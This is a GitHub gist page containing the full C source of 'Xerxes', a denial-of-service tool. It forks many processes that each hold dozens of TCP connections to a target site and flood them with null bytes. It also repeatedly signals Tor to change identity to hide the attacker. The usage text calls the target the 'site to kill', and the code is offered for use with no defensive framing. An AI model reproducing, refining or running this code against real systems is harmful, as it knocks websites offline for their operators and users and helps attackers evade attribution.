Skip to content

Instantly share code, notes, and snippets.

@Xe
Created July 20, 2013 04:21
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 8 You must be signed in to fork a gist
  • Save Xe/6043848 to your computer and use it in GitHub Desktop.
Save Xe/6043848 to your computer and use it in GitHub Desktop.
//Xerxes, code assumed to be public domain
//by tH3j3st3r
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "config.h"
extern int attacks = 0;
/*
* This function just abstracts sockets to an easier way of calling them.
*/
int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
// hints.ai_socktype = SOCK_DGRAM;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made to %s:%s\n", host, port);
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
//fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}
/*
* Generic stop function
*/
void broke(int s) {
// do nothing
}
#define CONNECTIONS 40
#define THREADS 60
/*
* This function will send a null character to the
* target site, which wastes the daemon's time, and is
* why this program works.
*/
void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
//r=write(sockets[x], "GET / HTTP/1.1\r\n\r\n", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else {
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
}
attacks++;
fprintf(stderr, "[%i:\tvolley sent, %d\t]\n", id, attacks);
}
usleep(300000);
}
}
/*
* This function will reset your tor identity, VERY USEFUL
*/
void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}
int main(int argc, char **argv) {
int x;
if(argc !=3) {
printf("xerxes Usage Summary:\n%s [site to kill] [port, 80 is best]\nYour tor identity has been reset\n\n", argv[0]);
cycle_identity();
return 0;
}
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment